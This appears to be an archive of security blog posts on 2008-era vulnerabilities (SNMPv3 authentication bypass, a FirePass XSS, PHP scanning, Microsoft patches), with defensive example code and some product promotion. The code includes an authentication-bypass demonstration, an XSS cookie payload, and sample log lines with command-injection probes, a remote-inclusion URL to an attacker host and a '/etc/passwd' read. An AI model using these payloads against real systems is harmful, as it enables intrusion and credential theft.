SNMP v3 Vulnerability and Exploit

A vulnerability was identified in many implementations of SNMPv3 that allows an attacker to bypass SNMPv3 authentication. Within a few days a working exploit was released into the wild. With it, remote attackers may be able to read and modify any SNMP-managed data on an affected system. This could affect a great many devices, and firmware will need to be updated across the board. The full extent of affected systems is not yet known, so assume that every device that implements SNMPv3 is vulnerable until its vendor says otherwise.
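The bypass in the affected implementations, as reported at the time, came from the receiver checking only as many bytes of the HMAC authenticator as the sender supplied, so a message carrying a one-byte (or empty) msgAuthenticationParameters field could be accepted without knowing the key. The following is an added illustration of that check pattern beside a corrected one; it is not code from any vendor's SNMP stack, and the key and message bytes are constructed for the example.

```python
import hashlib
import hmac

# Constructed example values (assumptions, not taken from any real device):
AUTH_KEY = bytes.fromhex("00112233445566778899aabbccddeeff")  # stand-in for a localized USM auth key
MESSAGE = b"\x30\x2a\x02\x01\x03" + b"constructed SNMPv3 message body"  # stand-in for the wire message


def usm_authenticator(key: bytes, message: bytes) -> bytes:
    """HMAC-SHA1-96 style USM authenticator: HMAC-SHA1 truncated to 12 bytes."""
    return hmac.new(key, message, hashlib.sha1).digest()[:12]


def verify_vulnerable(key: bytes, message: bytes, received: bytes) -> bool:
    """Flaw pattern: compares only as many bytes as the *peer* chose to send.

    A zero-length authenticator therefore always matches, and a one-byte
    authenticator matches for 1 of 256 guesses.
    """
    expected = usm_authenticator(key, message)
    return expected[: len(received)] == received


def verify_fixed(key: bytes, message: bytes, received: bytes) -> bool:
    """Hardened: enforce the protocol's fixed authenticator length, then
    compare in constant time so the check leaks nothing about the key."""
    expected = usm_authenticator(key, message)
    if len(received) != len(expected):
        return False
    return hmac.compare_digest(expected, received)


def accepted_guesses(verify, key: bytes, message: bytes, width: int) -> int:
    """Count how many of the 256**width possible authenticators of `width`
    bytes a verifier accepts. An attacker without the key can simply send
    each one; for width=1 that is at most 256 packets."""
    return sum(
        1
        for v in range(256 ** width)
        if verify(key, message, v.to_bytes(width, "big"))
    )


if __name__ == "__main__":
    for name, fn in (("vulnerable", verify_vulnerable), ("fixed", verify_fixed)):
        print(name, "accepts empty authenticator:", fn(AUTH_KEY, MESSAGE, b""))
        print(name, "one-byte guesses accepted:", accepted_guesses(fn, AUTH_KEY, MESSAGE, 1))
```

The practitioner's check is the length test: an authenticator field shorter than the algorithm's fixed output must be rejected outright, and the comparison that follows should be constant-time.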

June Virtual Event Announced – Social Engineering Assessments Primer

We are proud to announce our June Virtual Event topic for the month. Please join us as we cover a primer on social engineering assessments and how they can help you secure your organization. As always, our virtual events are long on information and short on sales and spin. They are also FREE!

Abstract:

This presentation will cover the reasons why your organization should consider a social engineering assessment as part of its routine security auditing processes. Examples of test scenarios will be given, along with ideas on scoping such tests. Further, ways to appropriately use the results and tips on presenting the identified issues to upper management will be discussed.

Date: Tuesday, June 26th at 4pm Eastern

To register for the presentation and to receive the PDF of the slides as well as the dial in number, please send email to info@microsolved.com with “June Virtual Event” or the like in the subject line.


Editors note: Sorry for the need to create a subject clarification, but we are holding several events this month including live and virtual versions of our State of the Threat presentations. If you need more info about those presentations, just ask. Thanks!

Microsoft Patch Tuesday details

MS08-030
Vulnerability in Bluetooth Stack Could Allow Remote Code Execution (951376)
A large number of specially crafted SDP (Service Discovery Protocol) requests could allow code execution.
Rated: Critical

MS08-031
Cumulative Security Update for Internet Explorer (950759)
Vulnerabilities in MSIE allow code execution and cross-domain information leaks.
Should be patched immediately, as details on exploitation are publicly available.
Rated: Critical
Replaces MS08-024.

MS08-032
Cumulative Security Update of ActiveX Kill Bits (950760)
A vulnerability in the Speech API could allow remote code execution in the context of the user viewing a specially crafted web page. Speech recognition must be enabled.
Rated: Moderate
Replaces MS08-023.

MS08-033
Vulnerabilities in DirectX Could Allow Remote Code Execution (951698)
Input validation vulnerabilities may allow code execution via DirectX.
Rated: Critical
Replaces MS07-064.

MS08-034
Vulnerability in WINS Could Allow Elevation of Privilege (948745)
A privilege escalation vulnerability in WINS could allow a local attacker to compromise a vulnerable system.
Rated: Important
Replaces MS04-045.

MS08-035
Vulnerability in Active Directory Could Allow Denial of Service (953235)
An input validation failure in LDAP request handling can lead to a Denial of Service.
Rated: Important
Replaces MS08-003.

MS08-036
Vulnerabilities in Pragmatic General Multicast (PGM) Could Allow Denial of Service (950762)
Input validation vulnerabilities in PGM packet handling can be leveraged to cause a Denial of Service.
Rated: Important
Replaces MS06-052.

Windows Advance Notification for June

Tomorrow Microsoft will be releasing updates for their monthly patch cycle. It looks like there will be three critical-rated bulletins. One of them is in the Bluetooth service. This one is interesting as it is listed as being remotely exploitable. Assuming that it is exploitable over the Bluetooth interface itself, this one could be very interesting. If it proves viable, watch for exploits for this vulnerability showing up in every attacker's repertoire.

F5 FirePass SSL VPN XSS

The F5 FirePass SSL VPN appliance is vulnerable to cross site scripting attacks within its management console. This device, part of whose job is to protect users against XSS attacks, contains an XSS in the /vdesk/admincon/webyfiers.php and /vdesk/admincon/index.php pages that could permit an attacker to force premature termination of a parameter value and inject an event handler script. This vulnerability has been confirmed in version 6.0.2, hotfix 3. Previous versions may also be affected. There is no fix for it at the moment, so users and admins should not browse to untrusted sites while logged in to the management interface.
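The injection pattern the advisory describes, a parameter reflected into an HTML attribute where a quote character ends the value early and an event handler is appended, is shown below as an added example. The rendering functions are hypothetical stand-ins written for this post and are not F5's code; the parsing check shows what a browser would see in each case.

```python
import html
from html.parser import HTMLParser

# Constructed attacker-supplied parameter value: the leading quote closes the
# attribute early, and the rest becomes a new event-handler attribute.
PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_unsafe(value: str) -> str:
    """Flaw pattern: reflects the parameter into an attribute without encoding."""
    return f'<input type="text" name="q" value="{value}">'


def render_safe(value: str) -> str:
    """Hardened: attribute-encode the value so quotes cannot end the attribute."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser would assign to the first <input> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input" and not self.attrs:
            self.attrs = dict(attrs)


def parsed_attrs(markup: str) -> dict:
    """Return the attribute dict of the first <input> in `markup`."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_handlers(markup: str) -> list:
    """List any on* event-handler attributes that ended up on the tag."""
    return sorted(a for a in parsed_attrs(markup) if a.startswith("on"))


if __name__ == "__main__":
    print("unsafe:", render_unsafe(PAYLOAD), "->", injected_handlers(render_unsafe(PAYLOAD)))
    print("safe:  ", render_safe(PAYLOAD), "->", injected_handlers(render_safe(PAYLOAD)))
```

The useful detail is that the encoded version still round-trips the original text as the attribute's value (the parser decodes `&quot;` back to a quote), so encoding costs nothing functionally while removing the attacker's ability to start a new attribute.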

Increases in PHP Scanning

We are detecting an increasing number of PHP scans for a series of known PHP vulnerabilities; thus far they are originating from Asia.

To date, we see no new attacks, just checks for known bad pages, particularly admin interfaces, and a couple of quick URLs that test for command injection. The scans seem to have begun in the last 24 hours, and the traffic appears to be related to a possible new PHP scanner. Likely, some new tool has been released that bundles a plethora of PHP vulnerability checks.

Organizations should ensure that any systems offering PHP or PHP applications have been properly assessed and patched.

HoneyPoint Security Server users are urged to deploy a web HoneyPoint or HornetPoint and to drop the hosts performing the scans into your firewall or router black hole lists. This allows you to take a "one strike and you're out" approach to black holing attacking systems.
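For sites without a HoneyPoint, the same "one strike and you're out" idea can be applied to ordinary web server logs. The example below is added here and is not part of the original post or of any MicroSolved product: it parses combined-log-format lines, flags requests for well-known PHP admin paths that do not exist on the host and requests carrying command-injection patterns, and emits a firewall rule per offending source. The probe path list, the injection regex and the log lines are constructed for the example and should be tuned to your own site.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Common/combined log format prefix (constructed regex, covers the fields used below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed probe paths: typical admin-interface checks from PHP scanners. Only a
# 404 on one of these counts, so legitimate admin traffic to a real path is not hit.
PROBE_PATHS = (
    "/phpmyadmin/", "/pma/", "/mysqladmin/", "/admin/", "/administrator/", "/webadmin/",
)

# Assumed command-injection patterns after URL-decoding: shell metacharacter
# followed by a common command, or a cmd=/exec=/command= query parameter.
CMD_INJ = re.compile(
    r"(?i)(?:[;|`]|\$\()\s*(?:cat|id|uname|wget|curl|ls|echo)\b|(?:\?|&)(?:cmd|exec|command)="
)


def classify(path: str, status: str):
    """Return a reason string if the request looks like scanner activity, else None."""
    decoded = unquote(path)
    if CMD_INJ.search(decoded):
        return "command-injection probe"
    lowered = decoded.lower()
    if status == "404" and any(lowered.startswith(p) for p in PROBE_PATHS):
        return "known admin-interface probe"
    return None


def scan(lines):
    """Map each offending source IP to the list of (path, reason) hits it generated."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines rather than guessing
        reason = classify(m["path"], m["status"])
        if reason:
            hits[m["ip"]].append((m["path"], reason))
    return dict(hits)


def blackhole_rules(hits) -> list:
    """One strike and you're out: one iptables DROP rule per offending source."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(hits)]


# Constructed sample log lines (RFC 5737 documentation addresses, not real scanners).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2008:09:14:02 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 404 512',
    '203.0.113.5 - - [10/Jun/2008:09:14:03 +0000] "GET /admin/config.php HTTP/1.1" 404 512',
    '192.0.2.10 - - [10/Jun/2008:09:15:11 +0000] "GET /index.php HTTP/1.1" 200 8731',
    '192.0.2.10 - - [10/Jun/2008:09:15:14 +0000] "GET /blog/post.php?id=5 HTTP/1.1" 200 4410',
    '198.51.100.7 - - [10/Jun/2008:09:16:40 +0000] "GET /index.php?page=http://evil.example/x.txt?cmd=id HTTP/1.1" 200 8731',
    '198.51.100.9 - - [10/Jun/2008:09:17:02 +0000] "GET /cgi-bin/test.php?x=%3Bcat%20/etc/passwd HTTP/1.1" 404 512',
    'not a log line at all',
]

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ip, entries in sorted(found.items()):
        for path, reason in entries:
            print(f"{ip}  {reason}: {path}")
    print("\n".join(blackhole_rules(found)))
```

The design choice worth noting is that the admin-path check is tied to a 404 response: a scanner hunting for pages you do not have will get one, while your own staff using a real admin URL will not, which keeps a one-strike policy from locking out legitimate users.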

Please let us know if you see any new PHP activity. We are currently watching this pattern for any zero-day type activity, but thus far we have observed only known security issues being probed.

VMware ESX and Java ASP Vulns, Akamai Exploit

Sun's Java Active Server Pages version 4.0.2 contains multiple vulnerabilities. They are numerous and could result in a variety of negative consequences, including remote system compromise, bypassing of security restrictions, and manipulation of data. Sun has released version 4.0.3, which corrects the issues in 4.0.2.

VMware ESX Server versions 2.x and 3.x are vulnerable to information disclosure, denial of service, and in some cases remote system compromise. All administrators and users of VMware should apply the vendor-provided patches to their software. Full details can be found at http://www.vmware.com/security/advisories/VMSA-2008-0009.html.

The Akamai Download Manager contains an input validation error in its ActiveX control. This could result in system compromise or a denial of service when a user visits a malicious web page. The vulnerability affects versions 2.2.3.5 and prior. A working exploit has already been released. Update to version 2.2.3.7, available at http://dlm.tools.akamai.com/tools/upgrade.html

SHOCKER – The FBI says Wi-Fi Hotspots are Insecure!!!

It’s hard to believe, but the FBI has recently announced that Wi-Fi Hotspots might not be secure.

I read it here, so it must be true… ;)

In a way I am glad to see public notices like this. Maybe if the FBI draws attention to the problems, average people will pay attention to the solution. Of course, their mitigation suggestions include the “keep your computer patched, use firewall and encryption” routine.

The sad part is that you can do all of these things and still fall victim to a number of security issues such as DNS poisoning, DHCP spoofing, social engineering and a myriad of other problems. I guess that is a perfect reason why we push so hard for average folks to use our HoneyPoint:Network Trust Agent product. At less than 10 bucks, it adds yet more capability and ease of use to protecting even non-technical users when they are on untrusted networks, including wi-fi.

Public networks are likely to remain unsafe for users who are not vigilant for a long time to come. Firewalls and patches can help keep them safe, but until they make better decisions about information security and can resist many of the basic attacks that leverage social engineering and the like, free wi-fi will likely be a cyber-wild west for a while longer.

If you want to hear more about protecting mobile users against public network threats, drop us a line. Until then, we will wait to hear from the FBI. Maybe they can help us get the word out that there is help available for wi-fi users.

CA Content Mgr DoS, Unspecified WebSphere Issue

A denial of service vulnerability has been reported in CA eTrust Secure Content Manager. It can also be exploited to compromise a vulnerable system. The vulnerability is caused by boundary errors in the handling of certain FTP requests that could result in a stack-based buffer overflow. It is reported in CA eTrust Secure Content Manager 8.0.
CA has provided a patch for this issue.

Also, an unspecified vulnerability in IBM WebSphere Application Server has been reported. Very few details are available regarding this vulnerability. IBM has released Fix Pack 17 to address this issue (whatever it is).